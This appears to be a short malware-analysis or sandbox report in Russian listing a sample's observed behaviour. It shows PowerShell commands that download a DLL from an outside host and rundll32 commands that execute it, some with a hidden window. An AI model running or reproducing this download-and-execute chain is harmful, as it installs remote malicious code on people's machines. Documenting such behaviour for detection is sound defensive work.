Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $u='https://dangerously.xyz/372873/svc.dll';$o='C:\yZkewtQ\mLDyLbq\MzJgbFH.dll';Invoke-WebRequest -Uri $u -OutFile $o
- '<SYSTEM32>\rundll32.exe' C:\yZkewtQ\mLDyLbq\MzJgbFH.dll,DllRegisterServer
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $u='https://dangerously.xyz/372873/svc.dll';$o='C:\yZkewtQ\mLDyLbq\MzJgbFH.dll';Invoke-WebRequest -Uri $u -OutFile $o' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' C:\yZkewtQ\mLDyLbq\MzJgbFH.dll,DllRegisterServer' (со скрытым окном)